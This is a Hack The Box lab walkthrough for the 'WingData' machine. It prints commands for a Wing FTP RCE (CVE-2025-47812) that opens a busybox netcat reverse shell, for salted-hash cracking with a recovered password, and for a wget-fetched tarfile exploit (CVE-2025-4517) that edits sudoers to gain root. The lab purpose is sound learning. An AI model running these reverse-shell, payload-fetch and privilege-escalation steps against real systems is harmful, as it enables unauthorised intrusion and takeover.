Back to HTBHack The Box
Write-up

πŸ’»WingData

WingftpSHA256+SaltTarfile

πŸͺΆ HTB WingData β€” Solution Notes

Platform: Hack The Box β€” Season 10 Machine: WingData OS: Linux (Debian 12) Difficulty: Easy Date: March 30, 2026 CVEs: CVE-2025-47812 Β· CVE-2025-4517

πŸ—ΊοΈ Attack Chain

Nmap β†’ /etc/hosts β†’ Web recon (wingdata.htb) β†’ ftp.wingdata.htb (Wing FTP v7.4.3) β†’ CVE-2025-47812 (busybox reverse shell) β†’ wingftp shell β†’ wacky.xml (SHA256 hash) β†’ hashcat (salt: WingFTP) β†’ wacky SSH login β†’ sudo -l β†’ CVE-2025-4517 (tarfile PATH_MAX bypass) β†’ ROOT

🧠 How Does a Hacker Think? β€” Before You Begin

When starting a machine, the first question in your mind should be: "How wide is this system's exposed attack surface?"

1️⃣ Reconnaissance

Port Scanning

bash

nmap -sV -sC -p- --min-rate 5000 10.129.244.106

Findings:

/etc/hosts Setup

πŸ’‘ Why Does /etc/hosts Matter?

bash

echo "10.129.244.106 wingdata.htb ftp.wingdata.htb" | sudo tee -a /etc/hosts

Web Discovery

The "Client Portal" button on the homepage β†’ redirects to http://ftp.wingdata.htb/.

bash

curl -s http://wingdata.htb/ | grep -i "href\|client\|ftp"

Version information found at the bottom of the ftp.wingdata.htb login page:

bash

curl -s http://ftp.wingdata.htb/login.html | grep -i "version\|wing" # Wing FTP Server v7.4.3

🧠 How Does a Hacker Think? β€” After Finding a Version Number

Once you find a software version, the first thing to do is: search CVE databases.

2️⃣ Initial Access β€” Wing FTP RCE (CVE-2025-47812)

πŸ’‘ What is CVE-2025-47812?

Download the Exploit

bash

searchsploit -m multiple/remote/52347.py

Listener

bash

nc -lvnp 4444

Exploit

bash

python3 52347.py -u http://ftp.wingdata.htb \ -c "busybox nc 10.10.14.26 4444 -e /bin/bash" -v

Shell Stabilization

bash

python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm # Ctrl+Z stty raw -echo; fg

User: wingftp

🚩 User Flag

The flag is not accessible as wingftp β€” we need to get to the wacky user first. Start by finding the hash:

bash

cat /opt/wftpserver/Data/1/users/wacky.xml

Hash found: 32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca

3️⃣ Lateral Movement β€” Hash Cracking

πŸ’‘ Wing FTP Password Format

Hashcat

bash

echo "32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP" > wacky_hash.txt hashcat -m 1410 wacky_hash.txt /usr/share/wordlists/rockyou.txt

Result: wacky : !#7Blushing^*Bride5

SSH Login

bash

ssh wacky@10.129.244.106 # Password: !#7Blushing^*Bride5

bash

cat ~/user.txt

🧠 How Does a Hacker Think? β€” The Path to Root

We're now wacky. Time for systematic enumeration for root:

4️⃣ Privilege Escalation β€” CVE-2025-4517

πŸ’‘ What is CVE-2025-4517?

Sudo Privileges

bash

sudo -l # (root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

Download and Run the Exploit Script (on the target machine)

bash

wget http://10.10.14.26:8080/cve_tar.py -O /tmp/cve_tar.py python3 /tmp/cve_tar.py --create-only

What the script does:

Result: wacky added to sudoers β†’ sudo /bin/bash β†’ ROOT! πŸŽ‰

🚩 Root Flag

bash

sudo /bin/bash cat /root/root.txt

πŸ“š Concepts Learned

πŸ”‘ General Hacker Mindset Summary

  1. Follow the links on the main page: Buttons like "Client Portal" can lead you to other subdomains.
  2. Search for CVEs immediately after finding a version: The searchsploit + Google combination is powerful.
  3. If the reverse shell doesn't work, try busybox: busybox nc IP PORT -e /bin/bash is much more reliable.
  4. Config files are a credential goldmine: /opt/wftpserver/Data/1/users/*.xml contained hashes and the salt.
  5. sudo -l is always the first check: Permission to run a script = potential privesc vector.
  6. "Secure" features can have CVEs too: filter="data" was considered safe β€” until CVE-2025-4517 bypassed it.

You might also want to look at these

Facts
Camelon CMS Β· S3 EnumerationApr 2026
Kobold
Recon Β· Subdomain Β· ffufMar 2026
CCTV
Sqlmap Β· Hashcat Β· tcpdumpMar 2026
Snapped
Vhost Fuzzing Β· PivotingMar 2026